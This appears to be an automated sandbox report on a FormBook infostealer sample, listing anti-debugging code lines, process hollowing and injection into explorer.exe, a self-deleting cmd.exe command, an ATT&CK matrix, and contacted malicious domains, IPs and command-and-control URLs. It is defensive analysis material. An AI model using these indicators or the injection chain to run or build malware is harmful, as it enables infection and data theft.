          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3AD30 mov eax, dword ptr fs:[00000030h]17_2_04E3AD30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6513A mov eax, dword ptr fs:[00000030h]17_2_04E6513A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6513A mov eax, dword ptr fs:[00000030h]17_2_04E6513A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EBA537 mov eax, dword ptr fs:[00000030h]17_2_04EBA537
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E64D3B mov eax, dword ptr fs:[00000030h]17_2_04E64D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E64D3B mov eax, dword ptr fs:[00000030h]17_2_04E64D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E64D3B mov eax, dword ptr fs:[00000030h]17_2_04E64D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39100 mov eax, dword ptr fs:[00000030h]17_2_04E39100
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39100 mov eax, dword ptr fs:[00000030h]17_2_04E39100
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39100 mov eax, dword ptr fs:[00000030h]17_2_04E39100
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62AE4 mov eax, dword ptr fs:[00000030h]17_2_04E62AE4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E616E0 mov ecx, dword ptr fs:[00000030h]17_2_04E616E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E476E2 mov eax, dword ptr fs:[00000030h]17_2_04E476E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E78EC7 mov eax, dword ptr fs:[00000030h]17_2_04E78EC7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F08ED6 mov eax, dword ptr fs:[00000030h]17_2_04F08ED6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E636CC mov eax, dword ptr fs:[00000030h]17_2_04E636CC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62ACB mov eax, dword ptr fs:[00000030h]17_2_04E62ACB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EEFEC0 mov eax, dword ptr fs:[00000030h]17_2_04EEFEC0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E352A5 mov eax, dword ptr fs:[00000030h]17_2_04E352A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E352A5 mov eax, dword ptr fs:[00000030h]17_2_04E352A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E352A5 mov eax, dword ptr fs:[00000030h]17_2_04E352A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E352A5 mov eax, dword ptr fs:[00000030h]17_2_04E352A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E352A5 mov eax, dword ptr fs:[00000030h]17_2_04E352A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB46A7 mov eax, dword ptr fs:[00000030h]17_2_04EB46A7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4AAB0 mov eax, dword ptr fs:[00000030h]17_2_04E4AAB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4AAB0 mov eax, dword ptr fs:[00000030h]17_2_04E4AAB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F00EA5 mov eax, dword ptr fs:[00000030h]17_2_04F00EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F00EA5 mov eax, dword ptr fs:[00000030h]17_2_04F00EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F00EA5 mov eax, dword ptr fs:[00000030h]17_2_04F00EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6FAB0 mov eax, dword ptr fs:[00000030h]17_2_04E6FAB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECFE87 mov eax, dword ptr fs:[00000030h]17_2_04ECFE87
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6D294 mov eax, dword ptr fs:[00000030h]17_2_04E6D294
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6D294 mov eax, dword ptr fs:[00000030h]17_2_04E6D294
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4766D mov eax, dword ptr fs:[00000030h]17_2_04E4766D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EEB260 mov eax, dword ptr fs:[00000030h]17_2_04EEB260
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EEB260 mov eax, dword ptr fs:[00000030h]17_2_04EEB260
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F08A62 mov eax, dword ptr fs:[00000030h]17_2_04F08A62
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5AE73 mov eax, dword ptr fs:[00000030h]17_2_04E5AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5AE73 mov eax, dword ptr fs:[00000030h]17_2_04E5AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5AE73 mov eax, dword ptr fs:[00000030h]17_2_04E5AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5AE73 mov eax, dword ptr fs:[00000030h]17_2_04E5AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5AE73 mov eax, dword ptr fs:[00000030h]17_2_04E5AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E7927A mov eax, dword ptr fs:[00000030h]17_2_04E7927A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39240 mov eax, dword ptr fs:[00000030h]17_2_04E39240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39240 mov eax, dword ptr fs:[00000030h]17_2_04E39240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39240 mov eax, dword ptr fs:[00000030h]17_2_04E39240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39240 mov eax, dword ptr fs:[00000030h]17_2_04E39240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E47E41 mov eax, dword ptr fs:[00000030h]17_2_04E47E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E47E41 mov eax, dword ptr fs:[00000030h]17_2_04E47E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E47E41 mov eax, dword ptr fs:[00000030h]17_2_04E47E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E47E41 mov eax, dword ptr fs:[00000030h]17_2_04E47E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E47E41 mov eax, dword ptr fs:[00000030h]17_2_04E47E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E47E41 mov eax, dword ptr fs:[00000030h]17_2_04E47E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EC4257 mov eax, dword ptr fs:[00000030h]17_2_04EC4257
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3E620 mov eax, dword ptr fs:[00000030h]17_2_04E3E620
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EEFE3F mov eax, dword ptr fs:[00000030h]17_2_04EEFE3F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3C600 mov eax, dword ptr fs:[00000030h]17_2_04E3C600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3C600 mov eax, dword ptr fs:[00000030h]17_2_04E3C600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3C600 mov eax, dword ptr fs:[00000030h]17_2_04E3C600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E68E00 mov eax, dword ptr fs:[00000030h]17_2_04E68E00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E48A0A mov eax, dword ptr fs:[00000030h]17_2_04E48A0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3AA16 mov eax, dword ptr fs:[00000030h]17_2_04E3AA16
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3AA16 mov eax, dword ptr fs:[00000030h]17_2_04E3AA16
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E53A1C mov eax, dword ptr fs:[00000030h]17_2_04E53A1C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6A61C mov eax, dword ptr fs:[00000030h]17_2_04E6A61C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6A61C mov eax, dword ptr fs:[00000030h]17_2_04E6A61C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E603E2 mov eax, dword ptr fs:[00000030h]17_2_04E603E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E603E2 mov eax, dword ptr fs:[00000030h]17_2_04E603E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E603E2 mov eax, dword ptr fs:[00000030h]17_2_04E603E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E603E2 mov eax, dword ptr fs:[00000030h]17_2_04E603E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E603E2 mov eax, dword ptr fs:[00000030h]17_2_04E603E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E603E2 mov eax, dword ptr fs:[00000030h]17_2_04E603E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E737F5 mov eax, dword ptr fs:[00000030h]17_2_04E737F5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB53CA mov eax, dword ptr fs:[00000030h]17_2_04EB53CA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB53CA mov eax, dword ptr fs:[00000030h]17_2_04EB53CA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F05BA5 mov eax, dword ptr fs:[00000030h]17_2_04F05BA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF138A mov eax, dword ptr fs:[00000030h]17_2_04EF138A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E41B8F mov eax, dword ptr fs:[00000030h]17_2_04E41B8F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E41B8F mov eax, dword ptr fs:[00000030h]17_2_04E41B8F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EED380 mov ecx, dword ptr fs:[00000030h]17_2_04EED380
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E48794 mov eax, dword ptr fs:[00000030h]17_2_04E48794
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62397 mov eax, dword ptr fs:[00000030h]17_2_04E62397
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6B390 mov eax, dword ptr fs:[00000030h]17_2_04E6B390
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB7794 mov eax, dword ptr fs:[00000030h]17_2_04EB7794
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB7794 mov eax, dword ptr fs:[00000030h]17_2_04EB7794
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB7794 mov eax, dword ptr fs:[00000030h]17_2_04EB7794
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3DB60 mov ecx, dword ptr fs:[00000030h]17_2_04E3DB60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4FF60 mov eax, dword ptr fs:[00000030h]17_2_04E4FF60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F08F6A mov eax, dword ptr fs:[00000030h]17_2_04F08F6A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E63B7A mov eax, dword ptr fs:[00000030h]17_2_04E63B7A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E63B7A mov eax, dword ptr fs:[00000030h]17_2_04E63B7A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3DB40 mov eax, dword ptr fs:[00000030h]17_2_04E3DB40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4EF40 mov eax, dword ptr fs:[00000030h]17_2_04E4EF40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F08B58 mov eax, dword ptr fs:[00000030h]17_2_04F08B58
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3F358 mov eax, dword ptr fs:[00000030h]17_2_04E3F358
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E34F2E mov eax, dword ptr fs:[00000030h]17_2_04E34F2E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E34F2E mov eax, dword ptr fs:[00000030h]17_2_04E34F2E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6E730 mov eax, dword ptr fs:[00000030h]17_2_04E6E730
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6A70E mov eax, dword ptr fs:[00000030h]17_2_04E6A70E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6A70E mov eax, dword ptr fs:[00000030h]17_2_04E6A70E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5F716 mov eax, dword ptr fs:[00000030h]17_2_04E5F716
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF131B mov eax, dword ptr fs:[00000030h]17_2_04EF131B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECFF10 mov eax, dword ptr fs:[00000030h]17_2_04ECFF10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECFF10 mov eax, dword ptr fs:[00000030h]17_2_04ECFF10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F0070D mov eax, dword ptr fs:[00000030h]17_2_04F0070D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F0070D mov eax, dword ptr fs:[00000030h]17_2_04F0070D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exe; Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 7_2_00409B30 LdrLoadDll
          Source: C:\Users\user\Desktop\583475.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe; Domain query: www.appsdeals14.com
          Source: C:\Windows\explorer.exe; Domain query: www.tinyhollywood.com
          Source: C:\Windows\explorer.exe; Network Connect: 68.66.224.28 80
          Source: C:\Windows\explorer.exe; Network Connect: 34.102.136.180 80
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 9D0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\583475.exe; Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000
          Source: C:\Users\user\Desktop\583475.exe; Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000
          Source: C:\Users\user\Desktop\583475.exe; Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: A7E008
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\583475.exe; Memory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\583475.exe; Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\cmstp.exe; Thread register set: target process: 3424
          Source: C:\Users\user\Desktop\583475.exe; Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: explorer.exe, 00000009.00000000.742102073.0000000000AD8000.00000004.00000020.sdmp; Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000009.00000000.759241300.0000000001080000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.921404234.00000000036D0000.00000002.00020000.sdmp; Binary or memory string: Program Manager
          Source: explorer.exe, 00000009.00000000.759241300.0000000001080000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.921404234.00000000036D0000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000009.00000000.759241300.0000000001080000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.921404234.00000000036D0000.00000002.00020000.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000009.00000000.759241300.0000000001080000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.921404234.00000000036D0000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
          Source: explorer.exe, 00000009.00000000.751150955.000000000A716000.00000004.00000001.sdmp; Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Users\user\Desktop\583475.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\583475.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 812 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 121 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 812 | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 14 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Hidden Files and Directories 1 | Cached Domain Credentials | System Information Discovery 112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 3 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph

          [Behavior graph. ID: 510246; Sample: 583475.exe; Startdate: 27/10/2021; Architecture: WINDOWS; Score: 100. Process chain: 583475.exe started AddInProcess32.exe; AddInProcess32.exe started cmstp.exe and autofmt.exe and injected into explorer.exe; cmstp.exe started cmd.exe; cmd.exe started conhost.exe.]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          583475.exe | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | 0% | Metadefender |
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | 0% | ReversingLabs |

          Unpacked PE Files

          Source | Detection | Scanner | Label
          7.0.AddInProcess32.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          7.0.AddInProcess32.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          7.2.AddInProcess32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          7.0.AddInProcess32.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          www.eeeptou.xyz/uat8/ | 0% | Avira URL Cloud | safe
          http://ns.adobe.c/gE | 0% | Avira URL Cloud | safe
          http://ns.adobe.cobj | 0% | URL Reputation | safe
          http://ns.adobe.cobjE | 0% | Avira URL Cloud | safe
          http://ns.ado/1E | 0% | Avira URL Cloud | safe
          http://ns.d | 0% | URL Reputation | safe
          http://www.tinyhollywood.com/uat8/?7n=GRDJ3ughmVrqUFdKRM8Q0h4JrA2wYJd2LMNbPLjm/ZbIfdCCVia0cPEPKDDb+4lh8gF7&_2Jp=lPpXAD | 0% | Avira URL Cloud | safe
          http://www.appsdeals14.com/uat8/?7n=6Y3MMElcCL8ncUt/K0lRUija0CRc99ofqSlJjt4IDKVpKgRu3E5zG/kW1DnZY4iUvzuw&_2Jp=lPpXAD | 0% | Avira URL Cloud | safe
          http://ns.adobe.c/g | 0% | URL Reputation | safe
          http://ns.ado/1 | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.eeeptou.xyz | 104.21.96.92 | true | true | | unknown
          tinyhollywood.com | 34.102.136.180 | true | false | | unknown
          www.google.com | 142.250.185.228 | true | false | | high
          appsdeals14.com | 68.66.224.28 | true | true | | unknown
          www.appsdeals14.com | unknown | unknown | true | | unknown
          www.tinyhollywood.com | unknown | unknown | true | | unknown

                      Contacted URLs

                      Name | Malicious | Antivirus Detection | Reputation
                      www.eeeptou.xyz/uat8/ | true | Avira URL Cloud: safe | low
                      http://www.tinyhollywood.com/uat8/?7n=GRDJ3ughmVrqUFdKRM8Q0h4JrA2wYJd2LMNbPLjm/ZbIfdCCVia0cPEPKDDb+4lh8gF7&_2Jp=lPpXAD | false | Avira URL Cloud: safe | unknown
                      http://www.appsdeals14.com/uat8/?7n=6Y3MMElcCL8ncUt/K0lRUija0CRc99ofqSlJjt4IDKVpKgRu3E5zG/kW1DnZY4iUvzuw&_2Jp=lPpXAD | true | Avira URL Cloud: safe | unknown
                      https://www.google.com/ | false | | high

                        URLs from Memory and Binaries

                        Name | Source | Malicious | Antivirus Detection | Reputation
                        https://www.google.com | 583475.exe, 00000000.00000002.741286003.0000000002C41000.00000004.00000001.sdmp | false | | high
                        http://ns.adobe.c/gE | 583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                        http://ns.adobe.cobj | 583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                        http://ns.adobe.cobjE | 583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                        http://ns.ado/1E | 583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                        http://ns.d | 583475.exe, 00000000.00000003.658913034.0000000006D81000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                        http://ns.adobe.c/g | 583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 583475.exe, 00000000.00000002.741286003.0000000002C41000.00000004.00000001.sdmp | false | | high
